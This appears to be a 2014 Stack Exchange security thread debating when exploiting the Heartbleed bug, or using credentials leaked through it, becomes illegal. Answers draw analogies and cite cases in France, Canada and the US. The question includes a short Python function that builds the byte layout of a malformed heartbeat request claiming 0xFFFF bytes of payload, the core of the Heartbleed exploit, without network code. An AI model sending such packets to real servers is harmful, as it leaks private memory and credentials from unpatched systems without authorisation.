According to news reports, arrests have already been made in relation to the Heartbleed bug. It sounds like this person captured the credentials the app used to access the website's database, and then used those credentials to access the database himself.

My question is, what part is illegal here? He was charged with "one count of unauthorized use of a computer and one count of mischief in relation to data." So, is it illegal to send a heartbeat request to a server knowing that the request will result in data leakage? If that data contained nothing but random bits, would it still be illegal or must it contain sensitive data to become illegal? Say passwords or other such info was present, does it then become illegal to have done it? Or does it become illegal to then take those credentials and log into a public-facing admin interface to the database?

What I'm confused about is where is the line between illegal hacking and just using information which is publicly visible? If a website leaves its DB credentials on its homepage with a link to a phpMyAdmin frontend to that DB, is it illegal to log in and look around?

At the risk of asking multiple broad questions that will lead to this question being closed: are there any rules of thumb for judging when curious snooping around to see how something works crosses the line to become illegal?
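For context on the mechanics being asked about: the leak stems from a payload-length field that the requester controls, which a vulnerable server trusted when echoing data back. Below is a minimal Python sketch of what such a heartbeat request looks like on the wire (byte construction only, no network code; field layout per RFC 6520, with the TLS 1.1 record version chosen here as an arbitrary assumption):

```python
import struct

def heartbeat_request(claimed_length: int, payload: bytes = b"") -> bytes:
    """Build the raw bytes of a TLS heartbeat request record (no I/O).

    Per RFC 6520, the heartbeat message carries its own payload_length
    field; a vulnerable OpenSSL build echoed back claimed_length bytes
    from memory without checking it against the actual payload size.
    """
    hb_type = 0x01  # 1 = heartbeat_request
    body = struct.pack(">BH", hb_type, claimed_length) + payload
    # TLS record header: content type 24 (heartbeat), version TLS 1.1 (0x0302)
    return struct.pack(">BHH", 0x18, 0x0302, len(body)) + body

# A benign request claims exactly the payload it sends:
benign = heartbeat_request(claimed_length=4, payload=b"ping")
# The Heartbleed trick claims up to 0xFFFF bytes while sending none:
malicious = heartbeat_request(claimed_length=0xFFFF)

# On the wire the two differ only in the claimed length and the payload:
assert len(benign) == 12 and len(malicious) == 8
```

The point relevant to the question is that the malicious record is perfectly well-formed at the protocol level; only the mismatch between the claimed and actual payload length distinguishes it, so it is hard to argue it could be sent by accident during normal browsing.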

My rule of thumb is: if the company doesn't have a bug bounty program, leave it the hell alone. Poking around for curiosity's sake won't stand up as a defense in court.
– Jay, Apr 17 '14 at 9:01

You certainly can't send a heartbleed exploit packet by accident during normal use of the site. So I'd consider the legal risk pretty high, especially if it's done repeatedly to the same host in order to learn information.
– CodesInChaos, Apr 17 '14 at 9:08

Steven - in the UK, scanning can be illegal.
– Rory Alsop♦, Apr 17 '14 at 10:37

Rephrased title for this thread: "why is it illegal to enter someone's house if they mistakenly left it open?"
– Darius, Apr 17 '14 at 12:01

Even though there are lots of highly-voted answers already, you put a 100 pt bounty asking for more information. What exactly do you think is missing from the existing answers?
– Philipp, Apr 19 '14 at 16:18

13 Answers

If you break into your neighbor's house, clearly you are in violation of the law. But if he lets you in, then you are not.

So what if you have a key? If he gave you the key along with permission to enter (to feed his dog while he's away), then you have authorization to enter. No trespass there.

On the other hand, if you find the key under his doormat, that does not imply authorization, even though it grants you access. You can get in easily enough, but it's trespassing.

Now, say you go door-to-door checking to see if anyone left a key under their doormat. You just go inside the vulnerable houses and have a look around; you don't steal anything, you're just looking. That's what's happening here with the Heartbleed problem. Someone is using their knowledge of a vulnerability (e.g. key sometimes appears under the doormat) to gain access, but they are not authorized to have access.

Yes, the keys they retrieve are accessible to anyone who understands the vulnerability, just as a key under a doormat is likewise technically accessible to the public. But that doesn't make it legal to use it.

First, this question has to be answered in a country-specific context, because each country has its own laws and regulations regarding computer crimes, intrusions, data manipulation, etc.

One important thing to consider is that the people who will judge these cases are not technically aware. They usually have no clear idea of what a database is, what a UDP datagram is, or sometimes even what Google is. So even if an IT expert is heard by the court, the decision will mainly be based on common sense.

I am not a specialist in Canadian law, but here are my thoughts:

Sending a single packet with prior knowledge that it can/will alter the data stored on a server can be regarded as a crime in some countries, no matter why it was done (e.g. a researcher trying to reproduce a bug) and what the impact is in the end;

The line between illegal hacking and just using information which is publicly visible is usually regarded this way by the authorities (e.g. a prosecutor or judge): did the organization make the information public and visible on purpose, or did the "attacker" use a trick to access it? In the end, this comes down to the intention of the user accessing the information.

It doesn't matter whether the leaked data contains useless random bits or explicitly sensitive information; the access was still performed without proper authorization. Of course, the level of sensitivity will probably be considered an aggravating factor.

A real-life example of this situation is the recent conviction in France of an Internet user who found, via Google, some company information that was not supposed to be there (it was indexed by the search engine due to an error by the company). Even though the data's integrity and availability were not at risk, and there was no actual intrusion, this Internet user was convicted of "unauthorized access to an Information System" and "data theft". A very detailed legal explanation is available here (in French).

In the end, there were two main things the authorities considered:

Regardless of how the access was performed, the data was not meant to be public, period. And in the case of the Heartbleed bug, no one can seriously claim that the cleartext data used by a program responsible for encrypting Internet communications was supposed to be publicly available.

The user did not access the data by accident, but instead by using some technical methods that a regular user wouldn't have been capable of. That includes Google hacking, crafting UDP datagrams, etc.

So, to answer your question, the line between illegal hacking and authorized access is basically: did the affected organization mandate or authorize you to access any of its data (e.g. via a Bug Bounty program or a penetration testing service)?

There has been a similar case in Poland, which led to the coining of the term “głębokie ukrycie” (“deeply hidden” in Polish) — basically a form of security through obscurity
– kinokijuf, Apr 19 '14 at 21:20

@ack__ Actually, what got that particular journalist convicted is that he admitted to knowing that he wasn't supposed to access the documents (even though they were indexed by search engines). Had he just shut up and lawyered up, he probably would have gotten away with it. What this means is that if you stumble on "illegal" information in good faith, because of the sysadmin's negligence, you're probably okay (at least in France) as long as you don't know that you should not be there. Of course, launching an exploit script (such as Heartbleed) will damage that "good faith" defense.
– executifs, Apr 24 '14 at 12:16

@executifs: Yes, this is why I highlight the intention of the user accessing the information, and that the user did not access the data by accident (even though the initial discovery of the data was "accidental", his action to collect all the available information was deliberate, and he knew the organization didn't make it public on purpose).
– ack__, Apr 24 '14 at 12:33

Alright then, I was a little confused by your choice of words. As long as we agree that the case wasn't decided on whether the discovery was accidental or not, but on the notion of "maintaining access", I second your opinion!
– executifs, Apr 24 '14 at 12:37

What I'm confused about is where is the line between illegal hacking and just using information which is publicly visible?

The question is whether this information is considered public, even if it's publicly visible. In this particular instance it's 100% clear that it is not. Even when a server admin leaves this bug unpatched, it doesn't mean that you are free to use it.

At least in France, if someone demonstrates that you knew this information was meant to be private and you took it anyway, you can be charged.
– Simon Bergot, Apr 17 '14 at 12:42

Then why do admins take security so seriously? Can't everyone just be lax and when the data leaks, just claim it was supposed to be protected and have everyone arrested?
– Stephen Solis-Reyes, Apr 17 '14 at 13:20

Well, that would be really stupid, to be honest. The data is gone, and a clever hacker would hide his tracks, so how would you make a claim? With Heartbleed, there is no logging at all!
– SPRBRN, Apr 17 '14 at 13:55

@StephenSolis-Reyes: getting people arrested doesn't change the fact that your data was stolen and leaked
– ack__, Apr 17 '14 at 14:58

@StephenSolis-Reyes: by analogy: lock your house, or figure that any burglars will probably be arrested since burglary is illegal?
– Steve Jessop, Apr 17 '14 at 16:21

From a purely technical viewpoint one could say that any data which can be accessed in some way is public, because technology doesn't distinguish between features and bugs. But laws are rarely that technical.

Legislation about what is and isn't illegal hacking varies a lot around the world. I am not a lawyer, but as far as I know, many jurisdictions consider data to be private when the owner of the system took steps to prevent public access. Should those steps turn out to be insufficient due to a software bug, accessing the data is still illegal when the person who accesses it has no reason to believe that it is supposed to be public.

When someone writes on their homepage "I set up a public MySQL database for everyone to experiment with, username is user and password is pass", it is reasonable to assume that any information in that database is public. When you have to exploit a security vulnerability in a software they use to obtain the login information, it is reasonable to assume that the information is not meant to be public.

"From a purely technical viewpoint one could say that any data which can be accessed in some way is public..." - not at all! This would mean that anything protected with public-key cryptography is public and, perhaps, even anything protected with a password in general. If you learned to factor large numbers or to compute discrete logarithms quickly, would it make most of the Internet public? (Of course, the same argument can be made about Heartbleed.)
– osa, Apr 20 '14 at 4:23

@SergeyOrshanskiy That's exactly what I was trying to say.
– Philipp, Apr 20 '14 at 17:18

In fact, from a technical point of view, ANYTHING can be accessed in some way. This is why we invented this public/private distinction in the first place.
– osa, Apr 21 '14 at 19:48

In the case of Heartbleed, one should remember that the company/sysadmin has taken proactive steps to protect data: they used OpenSSL to secure a web portal. The fact that there was an undiscovered bug in it was not the fault of the company. They attempted to protect the data. Any court/jury, using common sense, would find for the company, not the person who obtained the data via the exploit.

To modify the analogies given above: in this case, both the analogy of a door left open (access not equating to permission to enter) and the analogy of a key left under the mat (access granted, but not authorization) are wrong.

I have the door to my house locked. The lock I use is a combination lock. I set the 4-digit code and secured the lock. I am the only one who knows that combination, and the lock maker says that no one else can learn it without painstakingly punching in every possible 4-digit sequence. My house is now safe.

Unfortunately, unknown to me (and not even discovered by the maker of the lock), the faceplate is removable, which reveals my numbers.

A thief comes along, takes off the cover, gets my code, and puts it back on. Now that thief has the ability to enter my house at will. Even if I change my code (SSL cert), it doesn't matter; the thief still has the ability to determine my new code.

You hear about the fact that the faceplate is removable and come to my house to check it out. You find out that, why YES, it is, and discover my code. You enter it, unlocking my front door, and step in. You don't take anything. (At least in the US) you have now committed breaking and entering, but not theft. Any jury in the US would convict you, because I did my best to protect my stuff, yet by means of an exploit unknown to me, you were able to enter.

The best real-world analog for unauthorized use of a computer is trespassing. Despite the fact that a web server is publicly connected to the Internet, it is technically private property. Someone owns that server and the software and data on it. They should have Terms of Use for the site which indicate what usage of their server is allowed. If you deviate from those Terms of Use, you are effectively trespassing on their system and may be criminally liable for misuse.

I am not a lawyer, and I do believe there has to be intent to misuse, just as it wouldn't be possible to make a trespassing claim if someone didn't know they were on private property. Thus it is somewhat ambiguous, but yes, generally, knowingly exploiting a bug is against the terms of service and thus illegal in and of itself. Further, once you capture someone else's credentials and use them, that is clearly illegal: you are now accessing someone else's account, which is pretty much always against the terms of service and shows clear intent to "trespass" in the system.

I'm less familiar with the "mischief in relation to data" charge, but my guess is that it has to do with the fact that they accessed someone else's private data by breaking into the system. That's a guess, though.

With information security, analogies to physical-world security are often made. For instance, a building is secured with a locked door; around that, a fence with a gate and a security guard; and so on.

Breaching a building's security layer(s) would be a criminal offense in most (all?) jurisdictions. I'd bet that's mostly called breaking and entering.

I guess the Canadian legislation is based on this analogy. It seems logical that whether snooping around a server by exploiting the Heartbleed bug is illegal depends on the country's legislation; I suppose either the country the server is located in, or the country where the server's owner is headquartered.

Exploiting the Heartbleed bug on its own isn't really analogous to breaking and entering. It's closer to standing in front of a glass-walled building and taking photos of its interior with a polarizing filter: the architects didn't think of that, and the occupants are so confident nobody can see inside from the outside that it might be rather unpleasant for them if someone did.
– TildalWave, Apr 17 '14 at 9:39

Gotcha, I haven't yet read about that case, which is why I was limiting my comment to exploiting the Heartbleed bug alone, not what illegal activities the learned information could later be used for.
– TildalWave, Apr 17 '14 at 9:52

As the name of the offence suggests, for "unauthorized use of a computer" it is significant whether permission was given.

It is presumed that permission is given, for example, to visit a website using a browser; you needn't have it in writing. It is not presumed that permission is given to use an unintentional feature such as the Heartbleed flaw. So yes, it could be held to be criminal to exploit a flaw on some web server without the knowledge of the owner of the server. It doesn't necessarily matter what (if anything) you do with any information retrieved.

This does mean that under certain circumstances, using a website in violation of its T&Cs might be considered criminal. There's not much in the way of test cases yet as far as I know, and I suspect that what is considered "using" a computer, what is considered "unauthorized", and to what extent the users of sites/servers are expected to understand what is permitted will vary significantly by jurisdiction. It's also probably going to vary whether security researchers have any legal protection, and if so how far it goes.

I cannot give you legal advice of course, but my observation is that very few security researchers get prosecuted when they test or scan for flaws without explicit permission. I'm not at all sure that's because what they're doing is lawful by statute, though, or just that nobody has any interest in prosecuting them.

There's a case between Craigslist and 3Taps (in the US, not Canada) in which there isn't even any exploit of a flaw. Craigslist was ruled to have properly denied 3Taps authorization to visit the site at all for the purpose of scraping it, but AFAIK there's no decision yet on whether 3Taps' actions were illegal under the Computer Fraud and Abuse Act.

The dividing line is not a line. It is fuzzy and decided not purely by logic but by persuasion. Persuasion of a jury by a prosecutor.

What is legal vs. illegal is not decided by those of us who work with tech. It is first decided by a few experts, then blessed by the government as law, and then interpreted by judges, lawyers, and a few 'lucky' people on juries.

Legislation and common law about theft, combined with the judges and juries of the court system, make computer trespass illegal.

Assuming a prosecutor can prove the facts of who, what, where, when, how to the jury through log files and an expert, what defense does the bug exploiter have?

In the U.S.A. there is the concept of mens rea, i.e. having a guilty mind. Crazy people can be found not guilty because they genuinely don't know right from wrong, but this merely moves the venue of imprisonment to a psychiatric facility.

But if someone exploits a bug for gain and to another person's detriment, I think as a juror it would be difficult to convince me that the person didn't know it was wrong. If it is proven they did it, and knew or should have known it was wrong, that's enough for a guilty vote so I can get back to life and quit being a juror.

You obtained this information using "navigation" procedures that are intrusive.

If you were not authorized to intrude into private areas, breach a barrier, etc., and you did so and saw something, that would be a crime.

So if the unauthorized information was wrongly posted on the home page and you read it, that would be their problem not yours. If you somehow "broke into" the system and read something unauthorized, it would be a crime.

Imagine a house surrounded by a fence. If you saw something "unauthorized" by looking through, around, or above the fence, that would not be illegal. If you climbed the fence (without authorization) and "saw something" as a result, that would be illegal. If you climbed the fence because the owner hired you to clean it and you saw something, that would not be illegal.

Q: Is it illegal to send a heartbeat request to a server knowing that the request will result in data leakage?

A: Sure. Search [cfaa]. The better question is, Are you likely to be prosecuted and put in federal prison? If the server is at the Pentagon, very possibly.

Q: If that data contained nothing but random bits, would it still be illegal or must it contain sensitive data to become illegal?

A: Theoretically if the data and the value of the computer usage is below a certain threshold you would not be subject to harsh computer-crime laws such as CFAA. Do you want to bet the next several years of your life on your interpretation of the law vs. that of the authorities? And do you think they'd believe your claim that the data is "random bits"? What if the prosecuting attorney claims they're encrypted nuclear bomb codes? Who do you think the nontechnical judge and jury would believe?

Q: Say passwords or other such info was present, does it then become illegal to have done it? Or does it become illegal to then take those credentials and log into a public-facing admin interface to the database?

A: Keep reading the CFAA.

Q: What I'm confused about is where is the line between illegal hacking and just using information which is publicly visible? If a website leaves its DB credentials on its homepage with a link to a phpMyAdmin frontend to that DB, is it illegal to log in and look around?

A: Possibly. You could pay a lawyer $25,000 to make the argument that leaving the DB credentials visible constitutes consent and you are therefore innocent. If you don't have $25,000, you might wind up having to plead guilty.

Q: At the risk of asking multiple broad questions that will lead to this question being closed: are there any rules of thumb for judging when curious snooping around to see how something works crosses the line to become illegal?

A: Again, assuming your "rule of thumb" is the same as that of the authorities can be a risky game.

Historically, there needed to be criminal intent for something to be a crime.

Nowadays, since incrementing a number by one in a script against a public webserver and logging the output can land you in prison, pretty much anything can be illegal if it involves a computer and you have annoyed someone.

I know some people who put Burp (for example) inline and go about their usual browsing. They find more bugs this way than you might think, and, as I mentioned, anything involving a computer can be illegal, so I wouldn't recommend talking to people about bugs that you see this way unless you are 100% positive how your information will be received.

I, personally, do zero manipulation and discovery of anything without a contractual agreement for work in place and would recommend that all readers do the same.

So if you can't disclose to the owners of the bug without being sent to a gulag, and you can't ethically sell the bug to an exploit house, nor can you post it on a full disclosure forum, what can you do exactly?

Welcome to the state of the industry. Legality is in the eye of those with a political agenda.